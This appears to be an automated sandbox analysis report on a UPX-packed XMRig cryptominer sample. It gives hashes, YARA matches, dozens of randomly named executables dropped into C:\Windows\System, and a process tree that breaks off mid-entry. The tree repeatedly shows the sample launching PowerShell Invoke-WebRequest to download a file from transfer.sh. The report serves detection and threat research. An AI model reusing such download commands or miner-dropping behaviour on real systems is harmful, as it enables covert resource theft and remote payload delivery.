xmrig | 33f6cefce262a56eac58ef0523ef1f30a6213d644569b800ca5f5f208818710d

Analysis

max time kernel
25s
max time network
185s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
21/10/2023, 21:25 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.85edad0734c3dc65b948047b90316970.exe
Size

1.3MB
MD5

85edad0734c3dc65b948047b90316970
SHA1

7fcfedaf30590cf9d866d5fdc4f1c8add1ee29a8
SHA256

33f6cefce262a56eac58ef0523ef1f30a6213d644569b800ca5f5f208818710d
SHA512

d1ad11b25245e05f15e52716bc3a3737a115a1d859f173ea85bbf69738c256c98d7a8d7d8f47b18c089e582bae69fe9432cd3ca7c3e2e37e4ba60d3a7f4f43cf
SSDEEP

24576:Roq+GQGrAwEsyEfVhxNLotSlCJ6UuW/mcG4L+1ZcpoiicADBPndAI2KS:Roq+G7EsyETxNLotSqEwvGoIZgmc+MKS

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral1/memory/3060-0-0x000000013F1D0000-0x000000013F524000-memory.dmp	xmrig
behavioral1/files/0x0032000000015569-22.dat	xmrig
behavioral1/files/0x0006000000015e3e-61.dat	xmrig
behavioral1/files/0x0006000000015dc1-60.dat	xmrig
behavioral1/files/0x0006000000015cb7-35.dat	xmrig
behavioral1/files/0x0006000000015d39-42.dat	xmrig
behavioral1/files/0x0008000000015c18-56.dat	xmrig
behavioral1/files/0x0006000000015ce9-55.dat	xmrig
behavioral1/files/0x0009000000015caf-54.dat	xmrig
behavioral1/files/0x0007000000015c67-28.dat	xmrig
behavioral1/files/0x0006000000015e3e-51.dat	xmrig
behavioral1/files/0x0007000000015c51-63.dat	xmrig
behavioral1/files/0x0006000000015dc1-45.dat	xmrig
behavioral1/files/0x0006000000015ce9-39.dat	xmrig
behavioral1/files/0x0009000000015caf-31.dat	xmrig
behavioral1/files/0x0007000000015c51-23.dat	xmrig
behavioral1/files/0x0008000000015c18-16.dat	xmrig
behavioral1/memory/2804-27-0x000000013FB70000-0x000000013FEC4000-memory.dmp	xmrig
behavioral1/files/0x0007000000015c45-25.dat	xmrig
behavioral1/files/0x0006000000015deb-48.dat	xmrig
behavioral1/files/0x0006000000015deb-73.dat	xmrig
behavioral1/files/0x0007000000004e74-85.dat	xmrig
behavioral1/files/0x0007000000015ecd-94.dat	xmrig
behavioral1/files/0x00060000000162c0-109.dat	xmrig
behavioral1/files/0x0006000000016066-108.dat	xmrig
behavioral1/memory/2104-66-0x000000013FDE0000-0x0000000140134000-memory.dmp	xmrig
behavioral1/files/0x000600000001658b-107.dat	xmrig
behavioral1/files/0x00060000000162c0-101.dat	xmrig
behavioral1/files/0x0006000000016066-93.dat	xmrig
behavioral1/files/0x0007000000015ecd-87.dat	xmrig
behavioral1/files/0x000600000001626b-98.dat	xmrig
behavioral1/files/0x00060000000167f8-122.dat	xmrig
behavioral1/files/0x0006000000016c34-137.dat	xmrig
behavioral1/files/0x0006000000016ad4-146.dat	xmrig
behavioral1/files/0x0006000000015eb9-170.dat	xmrig
behavioral1/files/0x00060000000167f8-182.dat	xmrig
behavioral1/memory/1236-270-0x000000013F760000-0x000000013FAB4000-memory.dmp	xmrig
behavioral1/files/0x0006000000016455-180.dat	xmrig
behavioral1/memory/1952-293-0x000000013F680000-0x000000013F9D4000-memory.dmp	xmrig
behavioral1/files/0x000600000001626b-177.dat	xmrig
behavioral1/memory/2620-296-0x000000013F260000-0x000000013F5B4000-memory.dmp	xmrig
behavioral1/memory/2608-298-0x000000013FA60000-0x000000013FDB4000-memory.dmp	xmrig
behavioral1/files/0x0006000000016ca3-176.dat	xmrig
behavioral1/memory/2308-300-0x000000013F5F0000-0x000000013F944000-memory.dmp	xmrig
behavioral1/memory/1544-303-0x000000013FFD0000-0x0000000140324000-memory.dmp	xmrig
behavioral1/memory/2024-306-0x000000013FD60000-0x00000001400B4000-memory.dmp	xmrig
behavioral1/files/0x0006000000016060-174.dat	xmrig
behavioral1/memory/2640-310-0x000000013FA90000-0x000000013FDE4000-memory.dmp	xmrig
behavioral1/memory/2772-314-0x000000013FCC0000-0x0000000140014000-memory.dmp	xmrig
behavioral1/memory/2720-315-0x000000013F950000-0x000000013FCA4000-memory.dmp	xmrig
behavioral1/memory/2500-316-0x000000013F100000-0x000000013F454000-memory.dmp	xmrig
behavioral1/files/0x0006000000016c25-157.dat	xmrig
behavioral1/files/0x0006000000016cbe-143.dat	xmrig
behavioral1/files/0x0006000000016c2b-134.dat	xmrig
behavioral1/files/0x0006000000016ba9-128.dat	xmrig
behavioral1/files/0x0006000000016ca3-140.dat	xmrig
behavioral1/files/0x0006000000016c25-131.dat	xmrig
behavioral1/files/0x000600000001658b-111.dat	xmrig
behavioral1/files/0x0006000000016455-104.dat	xmrig
behavioral1/files/0x0006000000016ad4-125.dat	xmrig
behavioral1/files/0x00060000000165f8-120.dat	xmrig
behavioral1/files/0x0006000000016060-90.dat	xmrig
behavioral1/files/0x0006000000015eb9-79.dat	xmrig
behavioral1/files/0x0006000000015d39-71.dat	xmrig

Executes dropped EXE 1 IoCs

pid	Process
2804	tiTuvZG.exe

Loads dropped DLL 1 IoCs

pid	Process
3060	NEAS.85edad0734c3dc65b948047b90316970.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3060-0-0x000000013F1D0000-0x000000013F524000-memory.dmp	upx
behavioral1/files/0x0032000000015569-22.dat	upx
behavioral1/files/0x0006000000015e3e-61.dat	upx
behavioral1/files/0x0006000000015dc1-60.dat	upx
behavioral1/files/0x0006000000015cb7-35.dat	upx
behavioral1/files/0x0006000000015d39-42.dat	upx
behavioral1/files/0x0008000000015c18-56.dat	upx
behavioral1/files/0x0006000000015ce9-55.dat	upx
behavioral1/files/0x0009000000015caf-54.dat	upx
behavioral1/files/0x0007000000015c67-28.dat	upx
behavioral1/files/0x0006000000015e3e-51.dat	upx
behavioral1/files/0x0007000000015c51-63.dat	upx
behavioral1/files/0x0006000000015dc1-45.dat	upx
behavioral1/files/0x0006000000015ce9-39.dat	upx
behavioral1/files/0x0009000000015caf-31.dat	upx
behavioral1/files/0x0007000000015c51-23.dat	upx
behavioral1/files/0x0008000000015c18-16.dat	upx
behavioral1/memory/2804-27-0x000000013FB70000-0x000000013FEC4000-memory.dmp	upx
behavioral1/files/0x0007000000015c45-25.dat	upx
behavioral1/files/0x0006000000015deb-48.dat	upx
behavioral1/files/0x0006000000015deb-73.dat	upx
behavioral1/files/0x0007000000004e74-85.dat	upx
behavioral1/files/0x0007000000015ecd-94.dat	upx
behavioral1/files/0x00060000000162c0-109.dat	upx
behavioral1/files/0x0006000000016066-108.dat	upx
behavioral1/memory/2104-66-0x000000013FDE0000-0x0000000140134000-memory.dmp	upx
behavioral1/files/0x000600000001658b-107.dat	upx
behavioral1/files/0x00060000000162c0-101.dat	upx
behavioral1/files/0x0006000000016066-93.dat	upx
behavioral1/files/0x0007000000015ecd-87.dat	upx
behavioral1/files/0x000600000001626b-98.dat	upx
behavioral1/files/0x00060000000167f8-122.dat	upx
behavioral1/files/0x0006000000016c34-137.dat	upx
behavioral1/files/0x0006000000016ad4-146.dat	upx
behavioral1/files/0x0006000000015eb9-170.dat	upx
behavioral1/files/0x00060000000167f8-182.dat	upx
behavioral1/memory/1236-270-0x000000013F760000-0x000000013FAB4000-memory.dmp	upx
behavioral1/files/0x0006000000016455-180.dat	upx
behavioral1/memory/1952-293-0x000000013F680000-0x000000013F9D4000-memory.dmp	upx
behavioral1/files/0x000600000001626b-177.dat	upx
behavioral1/memory/2620-296-0x000000013F260000-0x000000013F5B4000-memory.dmp	upx
behavioral1/memory/2608-298-0x000000013FA60000-0x000000013FDB4000-memory.dmp	upx
behavioral1/files/0x0006000000016ca3-176.dat	upx
behavioral1/memory/2308-300-0x000000013F5F0000-0x000000013F944000-memory.dmp	upx
behavioral1/memory/1544-303-0x000000013FFD0000-0x0000000140324000-memory.dmp	upx
behavioral1/memory/2024-306-0x000000013FD60000-0x00000001400B4000-memory.dmp	upx
behavioral1/files/0x0006000000016060-174.dat	upx
behavioral1/memory/2640-310-0x000000013FA90000-0x000000013FDE4000-memory.dmp	upx
behavioral1/memory/2772-314-0x000000013FCC0000-0x0000000140014000-memory.dmp	upx
behavioral1/memory/2720-315-0x000000013F950000-0x000000013FCA4000-memory.dmp	upx
behavioral1/memory/2500-316-0x000000013F100000-0x000000013F454000-memory.dmp	upx
behavioral1/files/0x0006000000016c25-157.dat	upx
behavioral1/files/0x0006000000016cbe-143.dat	upx
behavioral1/files/0x0006000000016c2b-134.dat	upx
behavioral1/files/0x0006000000016ba9-128.dat	upx
behavioral1/files/0x0006000000016ca3-140.dat	upx
behavioral1/files/0x0006000000016c25-131.dat	upx
behavioral1/files/0x000600000001658b-111.dat	upx
behavioral1/files/0x0006000000016455-104.dat	upx
behavioral1/files/0x0006000000016ad4-125.dat	upx
behavioral1/files/0x00060000000165f8-120.dat	upx
behavioral1/files/0x0006000000016060-90.dat	upx
behavioral1/files/0x0006000000015eb9-79.dat	upx
behavioral1/files/0x0006000000015d39-71.dat	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System\tiTuvZG.exe	NEAS.85edad0734c3dc65b948047b90316970.exe
File created	C:\Windows\System\JYHORJq.exe	NEAS.85edad0734c3dc65b948047b90316970.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3060 wrote to memory of 2728	3060	NEAS.85edad0734c3dc65b948047b90316970.exe	28
PID 3060 wrote to memory of 2728	3060	NEAS.85edad0734c3dc65b948047b90316970.exe	28
PID 3060 wrote to memory of 2728	3060	NEAS.85edad0734c3dc65b948047b90316970.exe	28
PID 3060 wrote to memory of 2804	3060	NEAS.85edad0734c3dc65b948047b90316970.exe	29
PID 3060 wrote to memory of 2804	3060	NEAS.85edad0734c3dc65b948047b90316970.exe	29
PID 3060 wrote to memory of 2804	3060	NEAS.85edad0734c3dc65b948047b90316970.exe	29

C:\Users\Admin\AppData\Local\Temp\NEAS.85edad0734c3dc65b948047b90316970.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.85edad0734c3dc65b948047b90316970.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
  2⤵
  PID:2728
- C:\Windows\System\tiTuvZG.exe
  C:\Windows\System\tiTuvZG.exe
  2⤵
  - Executes dropped EXE
  PID:2804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:2628
- C:\Windows\System\tSqshlr.exe
  C:\Windows\System\tSqshlr.exe
  2⤵
  PID:1236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:1536
- C:\Windows\System\VbIGFaU.exe
  C:\Windows\System\VbIGFaU.exe
  2⤵
  PID:2640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:2336
- C:\Windows\System\VrKlbAu.exe
  C:\Windows\System\VrKlbAu.exe
  2⤵
  PID:1544
- C:\Windows\System\SYFnzoR.exe
  C:\Windows\System\SYFnzoR.exe
  2⤵
  PID:560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:440
- C:\Windows\System\AiyLpAn.exe
  C:\Windows\System\AiyLpAn.exe
  2⤵
  PID:2940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:1920
- C:\Windows\System\EtYXiAc.exe
  C:\Windows\System\EtYXiAc.exe
  2⤵
  PID:864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:1568
- C:\Windows\System\BjmfRxU.exe
  C:\Windows\System\BjmfRxU.exe
  2⤵
  PID:1956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:2908
- C:\Windows\System\sVZOxkx.exe
  C:\Windows\System\sVZOxkx.exe
  2⤵
  PID:564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:1988
- C:\Windows\System\eIQXwUG.exe
  C:\Windows\System\eIQXwUG.exe
  2⤵
  PID:1184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3056
- C:\Windows\System\vvoPmkU.exe
  C:\Windows\System\vvoPmkU.exe
  2⤵
  PID:1072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:548
- C:\Windows\System\etBLKwF.exe
  C:\Windows\System\etBLKwF.exe
  2⤵
  PID:3000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3044
- C:\Windows\System\IgkJztv.exe
  C:\Windows\System\IgkJztv.exe
  2⤵
  PID:1776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:640
- C:\Windows\System\BDWmsNx.exe
  C:\Windows\System\BDWmsNx.exe
  2⤵
  PID:1688
- C:\Windows\System\XCMgRwT.exe
  C:\Windows\System\XCMgRwT.exe
  2⤵
  PID:1908
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:2020
- C:\Windows\System\rNkjoAG.exe
  C:\Windows\System\rNkjoAG.exe
  2⤵
  PID:848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:1492
- C:\Windows\System\cmSGgNe.exe
  C:\Windows\System\cmSGgNe.exe
  2⤵
  PID:2444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:1388
- C:\Windows\System\YGoxGSj.exe
  C:\Windows\System\YGoxGSj.exe
  2⤵
  PID:2952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:2928
- C:\Windows\System\sHqPAgj.exe
  C:\Windows\System\sHqPAgj.exe
  2⤵
  PID:2860
- C:\Windows\System\FbWWuWb.exe
  C:\Windows\System\FbWWuWb.exe
  2⤵
  PID:2912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3104
- C:\Windows\System\eUNgoGs.exe
  C:\Windows\System\eUNgoGs.exe
  2⤵
  PID:2664
- C:\Windows\System\CYxBfSw.exe
  C:\Windows\System\CYxBfSw.exe
  2⤵
  PID:2896
- C:\Windows\System\intQGTZ.exe
  C:\Windows\System\intQGTZ.exe
  2⤵
  PID:2752
- C:\Windows\System\gtRmFIG.exe
  C:\Windows\System\gtRmFIG.exe
  2⤵
  PID:3128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3180
- C:\Windows\System\noHqRPT.exe
  C:\Windows\System\noHqRPT.exe
  2⤵
  PID:388
- C:\Windows\System\WaLUhmS.exe
  C:\Windows\System\WaLUhmS.exe
  2⤵
  PID:2676
- C:\Windows\System\zxyOHNA.exe
  C:\Windows\System\zxyOHNA.exe
  2⤵
  PID:2656
- C:\Windows\System\WzqPFKg.exe
  C:\Windows\System\WzqPFKg.exe
  2⤵
  PID:3200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3260
- C:\Windows\System\EFqCuTQ.exe
  C:\Windows\System\EFqCuTQ.exe
  2⤵
  PID:2904
- C:\Windows\System\ObToWhu.exe
  C:\Windows\System\ObToWhu.exe
  2⤵
  PID:2852
- C:\Windows\System\RienwET.exe
  C:\Windows\System\RienwET.exe
  2⤵
  PID:2756
- C:\Windows\System\YTrsRAT.exe
  C:\Windows\System\YTrsRAT.exe
  2⤵
  PID:3288
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3340
- C:\Windows\System\XPloaUf.exe
  C:\Windows\System\XPloaUf.exe
  2⤵
  PID:1620
- C:\Windows\System\AcWueAk.exe
  C:\Windows\System\AcWueAk.exe
  2⤵
  PID:1736
- C:\Windows\System\CmxtFMb.exe
  C:\Windows\System\CmxtFMb.exe
  2⤵
  PID:2216
- C:\Windows\System\wPUKvZd.exe
  C:\Windows\System\wPUKvZd.exe
  2⤵
  PID:2296
- C:\Windows\System\UPERSFm.exe
  C:\Windows\System\UPERSFm.exe
  2⤵
  PID:2240
- C:\Windows\System\VEsmezq.exe
  C:\Windows\System\VEsmezq.exe
  2⤵
  PID:3352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3620
- C:\Windows\System\tfdhuFA.exe
  C:\Windows\System\tfdhuFA.exe
  2⤵
  PID:2204
- C:\Windows\System\wIgdMki.exe
  C:\Windows\System\wIgdMki.exe
  2⤵
  PID:3392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3416
- C:\Windows\System\PqtkvFH.exe
  C:\Windows\System\PqtkvFH.exe
  2⤵
  PID:3656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3676
- C:\Windows\System\eFYwXWE.exe
  C:\Windows\System\eFYwXWE.exe
  2⤵
  PID:3736
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3760
- C:\Windows\System\NNFoCHM.exe
  C:\Windows\System\NNFoCHM.exe
  2⤵
  PID:3816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3884
- C:\Windows\System\QObPlLE.exe
  C:\Windows\System\QObPlLE.exe
  2⤵
  PID:3848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3904
- C:\Windows\System\LvzpGhm.exe
  C:\Windows\System\LvzpGhm.exe
  2⤵
  PID:3832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3112
- C:\Windows\System\vwxURYc.exe
  C:\Windows\System\vwxURYc.exe
  2⤵
  PID:3960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3160
- C:\Windows\System\NRzJGQV.exe
  C:\Windows\System\NRzJGQV.exe
  2⤵
  PID:4076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3672
- C:\Windows\System\xfbvCxe.exe
  C:\Windows\System\xfbvCxe.exe
  2⤵
  PID:3124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4020
- C:\Windows\System\tBKyuNF.exe
  C:\Windows\System\tBKyuNF.exe
  2⤵
  PID:4056
- C:\Windows\System\ldoRzgk.exe
  C:\Windows\System\ldoRzgk.exe
  2⤵
  PID:4040
- C:\Windows\System\TTxgwkv.exe
  C:\Windows\System\TTxgwkv.exe
  2⤵
  PID:4024
- C:\Windows\System\BePhQOg.exe
  C:\Windows\System\BePhQOg.exe
  2⤵
  PID:4008
- C:\Windows\System\xGdtFfA.exe
  C:\Windows\System\xGdtFfA.exe
  2⤵
  PID:3992
- C:\Windows\System\KbVDzba.exe
  C:\Windows\System\KbVDzba.exe
  2⤵
  PID:3860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3968
- C:\Windows\System\XXkZMhF.exe
  C:\Windows\System\XXkZMhF.exe
  2⤵
  PID:3976
- C:\Windows\System\nozyOOh.exe
  C:\Windows\System\nozyOOh.exe
  2⤵
  PID:3944
- C:\Windows\System\llcnfnE.exe
  C:\Windows\System\llcnfnE.exe
  2⤵
  PID:3928
- C:\Windows\System\nolxhPP.exe
  C:\Windows\System\nolxhPP.exe
  2⤵
  PID:3800
- C:\Windows\System\uZVeHsT.exe
  C:\Windows\System\uZVeHsT.exe
  2⤵
  PID:3784
- C:\Windows\System\rkHMmGn.exe
  C:\Windows\System\rkHMmGn.exe
  2⤵
  PID:4004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4052
- C:\Windows\System\tluYlLF.exe
  C:\Windows\System\tluYlLF.exe
  2⤵
  PID:2080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:2232
- C:\Windows\System\cHusyne.exe
  C:\Windows\System\cHusyne.exe
  2⤵
  PID:2052
- C:\Windows\System\creRxLC.exe
  C:\Windows\System\creRxLC.exe
  2⤵
  PID:3988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:3280
- C:\Windows\System\zqfuAyp.exe
  C:\Windows\System\zqfuAyp.exe
  2⤵
  PID:904
- C:\Windows\System\RhHBwGZ.exe
  C:\Windows\System\RhHBwGZ.exe
  2⤵
  PID:2572
- C:\Windows\System\QdgApys.exe
  C:\Windows\System\QdgApys.exe
  2⤵
  PID:2420
- C:\Windows\System\Sxwczjl.exe
  C:\Windows\System\Sxwczjl.exe
  2⤵
  PID:3776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4036
- C:\Windows\System\jZUQVqr.exe
  C:\Windows\System\jZUQVqr.exe
  2⤵
  PID:2320
- C:\Windows\System\bcUKFqL.exe
  C:\Windows\System\bcUKFqL.exe
  2⤵
  PID:2040
- C:\Windows\System\CatSeWy.exe
  C:\Windows\System\CatSeWy.exe
  2⤵
  PID:1752
- C:\Windows\System\skdXHFl.exe
  C:\Windows\System\skdXHFl.exe
  2⤵
  PID:3208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4136
- C:\Windows\System\nHCnUaY.exe
  C:\Windows\System\nHCnUaY.exe
  2⤵
  PID:3040
- C:\Windows\System\rhtpklo.exe
  C:\Windows\System\rhtpklo.exe
  2⤵
  PID:2500
- C:\Windows\System\mdmbYhK.exe
  C:\Windows\System\mdmbYhK.exe
  2⤵
  PID:2308
- C:\Windows\System\GsCtCoq.exe
  C:\Windows\System\GsCtCoq.exe
  2⤵
  PID:2720
- C:\Windows\System\TcWdHpq.exe
  C:\Windows\System\TcWdHpq.exe
  2⤵
  PID:2620
- C:\Windows\System\mbljTCn.exe
  C:\Windows\System\mbljTCn.exe
  2⤵
  PID:2772
- C:\Windows\System\xTlmePE.exe
  C:\Windows\System\xTlmePE.exe
  2⤵
  PID:1952
- C:\Windows\System\MQsCuKz.exe
  C:\Windows\System\MQsCuKz.exe
  2⤵
  PID:4144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4188
- C:\Windows\System\SuGakjV.exe
  C:\Windows\System\SuGakjV.exe
  2⤵
  PID:2024
- C:\Windows\System\bzfLnjd.exe
  C:\Windows\System\bzfLnjd.exe
  2⤵
  PID:4200
- C:\Windows\System\wfqepEd.exe
  C:\Windows\System\wfqepEd.exe
  2⤵
  PID:4248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4280
- C:\Windows\System\smvWcrW.exe
  C:\Windows\System\smvWcrW.exe
  2⤵
  PID:4232
- C:\Windows\System\rUeeTqZ.exe
  C:\Windows\System\rUeeTqZ.exe
  2⤵
  PID:4216
- C:\Windows\System\KpQTjnp.exe
  C:\Windows\System\KpQTjnp.exe
  2⤵
  PID:4380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4432
- C:\Windows\System\zHlBupF.exe
  C:\Windows\System\zHlBupF.exe
  2⤵
  PID:4364
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4544
- C:\Windows\System\xheYFTl.exe
  C:\Windows\System\xheYFTl.exe
  2⤵
  PID:4348
- C:\Windows\System\wlZtGLW.exe
  C:\Windows\System\wlZtGLW.exe
  2⤵
  PID:4332
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4536
- C:\Windows\System\tOqlKEj.exe
  C:\Windows\System\tOqlKEj.exe
  2⤵
  PID:4468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4488
- C:\Windows\System\tnSEtck.exe
  C:\Windows\System\tnSEtck.exe
  2⤵
  PID:4316
- C:\Windows\System\oHkWetI.exe
  C:\Windows\System\oHkWetI.exe
  2⤵
  PID:4300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4528
- C:\Windows\System\IscBQQk.exe
  C:\Windows\System\IscBQQk.exe
  2⤵
  PID:4568
- C:\Windows\System\oBCNiJE.exe
  C:\Windows\System\oBCNiJE.exe
  2⤵
  PID:2608
- C:\Windows\System\qIlxUpa.exe
  C:\Windows\System\qIlxUpa.exe
  2⤵
  PID:2744
- C:\Windows\System\JYHORJq.exe
  C:\Windows\System\JYHORJq.exe
  2⤵
  PID:2104
- C:\Windows\System\AgneaHU.exe
  C:\Windows\System\AgneaHU.exe
  2⤵
  PID:4652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4680
- C:\Windows\System\Juyzpjj.exe
  C:\Windows\System\Juyzpjj.exe
  2⤵
  PID:4864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4888
- C:\Windows\System\yomHegP.exe
  C:\Windows\System\yomHegP.exe
  2⤵
  PID:4912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4964
- C:\Windows\System\GGsBMyO.exe
  C:\Windows\System\GGsBMyO.exe
  2⤵
  PID:4976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:4996
- C:\Windows\System\SLSNitR.exe
  C:\Windows\System\SLSNitR.exe
  2⤵
  PID:5040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
